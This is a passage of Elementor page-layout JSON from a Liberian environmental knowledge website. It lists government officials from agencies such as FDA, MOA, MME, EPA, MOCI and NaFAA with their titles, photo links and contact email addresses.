href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd05ae4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/wonpue.jpg\",\"id\":5091,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"784af4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/nadine.jpg\",\"id\":5093,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9662e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/henry.jpg\",\"id\":5097,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inlin